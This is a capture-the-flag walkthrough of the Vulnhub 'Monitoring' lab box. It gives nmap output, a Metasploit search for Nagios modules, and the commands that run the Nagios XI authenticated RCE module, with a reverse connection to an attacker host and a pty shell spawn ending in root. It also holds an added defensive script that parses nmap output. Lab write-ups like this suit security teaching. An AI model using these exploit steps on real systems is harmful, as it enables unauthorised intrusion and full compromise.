
Vulnhub Monitoring: Walkthrough

Mattia Zignale

Port Scanning, as usual

We scanned our Monitoring box with nmap using the following command:

nmap -sV 10.10.10.12 -oN nmap_monitoring.txt

and these were the results:

Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-18 13:46 EDT
Nmap scan report for 10.10.10.12
Host is up (0.000097s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:4A:62:FE (Oracle VirtualBox virtual NIC)
Service Info: Host: ubuntu; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.71 seconds
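
From the defender's side, the same scan output can be checked against what the host is supposed to expose. The following is an added example, not part of the original walkthrough: it parses nmap's normal (-oN) output and lists open services outside an approved baseline. The APPROVED policy and the function names are assumptions made for illustration, and the sample is constructed from the results above.

```python
import re

# Constructed sample: host and service lines from the scan results above (-oN format).
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.12
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:4A:62:FE (Oracle VirtualBox virtual NIC)
"""

# Hypothetical policy (assumption): only SSH and HTTPS should be reachable.
APPROVED = {(22, "tcp"), (443, "tcp")}

# Matches both "report for 10.0.0.1" and "report for name (10.0.0.1)".
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([^\s()]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap_normal(text):
    """Return {host: [(port, proto, state, service, version), ...]}."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = []
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service, version = m.groups()
            hosts[current].append((int(port), proto, state, service, version.strip()))
    return hosts

def unapproved_open(hosts, approved):
    """List open services that are not in the approved baseline."""
    return [(host, port, proto, service, version)
            for host, services in hosts.items()
            for port, proto, state, service, version in services
            if state == "open" and (port, proto) not in approved]

if __name__ == "__main__":
    for finding in unapproved_open(parse_nmap_normal(SAMPLE_SCAN), APPROVED):
        print("unapproved: %s %d/%s %s %s" % finding)
```

With the baseline above, SMTP, plain HTTP and LDAP are reported as exposure to review.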

As usual, let’s see what’s on 80 and 443 first of all.

Same content for both 80 and 443 ports.

Oh look at that, seems we have a form!

We tried some common user/pass combinations like admin/admin, admin/password and so on, but we were not as lucky as we thought.

Exploiting: maybe the right path?

Ok, let’s see if we can get something with Metasploit. Let’s search for nagios with:

msfconsole

and then

search nagios

we got this:

Matching Modules
================
#  Name                                                          Disclosure Date  Rank       Check  Description
-  ----                                                          ---------------  ----       -----  -----------
0  exploit/linux/http/nagios_xi_authenticated_rce                2019-07-29       excellent  Yes    Nagios XI Authenticated Remote Command Execution
1  exploit/linux/http/nagios_xi_chained_rce                      2016-03-06       excellent  Yes    Nagios XI Chained Remote Code Execution
2  exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo  2018-04-17       manual     Yes    Nagios XI Chained Remote Code Execution
3  exploit/linux/http/nagios_xi_magpie_debug                     2018-11-14       excellent  Yes    Nagios XI Magpie_debug.php Root Remote Code Execution
4  exploit/linux/misc/nagios_nrpe_arguments                      2013-02-21       excellent  Yes    Nagios Remote Plugin Executor Arbitrary Command Execution
5  exploit/unix/webapp/nagios3_history_cgi                       2012-12-09       great      Yes    Nagios3 history.cgi Host Command Execution
6  exploit/unix/webapp/nagios3_statuswml_ping                    2009-06-22       excellent  No     Nagios3 statuswml.cgi Ping Command Execution
7  exploit/unix/webapp/nagios_graph_explorer                     2012-11-30       excellent  Yes    Nagios XI Network Monitor Graph Explorer Component Command Injection
8  post/linux/gather/enum_nagios_xi                              2018-04-17       normal     No     Nagios XI Enumeration

(Sorry for bad formatting, we added some space to make this cleaner)

We used the nagios_xi_authenticated_rce module, set all the needed information and then ran it:

msf5 > use exploit/linux/http/nagios_xi_authenticated_rce
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > set rhost 10.10.10.12
rhost => 10.10.10.12
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > set lhost 10.10.10.4
lhost => 10.10.10.4
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > set password admin
password => admin
msf5 exploit(linux/http/nagios_xi_authenticated_rce) > run

The RHOST is the Monitoring box, LHOST is your attacking machine (Kali in this case) and PASSWORD is the password which will be used for login.

Use the shell command and then python (as we did in Cherry 1’s walkthrough) to open an interactive shell:

shell
python -c 'import pty;pty.spawn("/bin/bash")'

Hey, look at that!

We are root!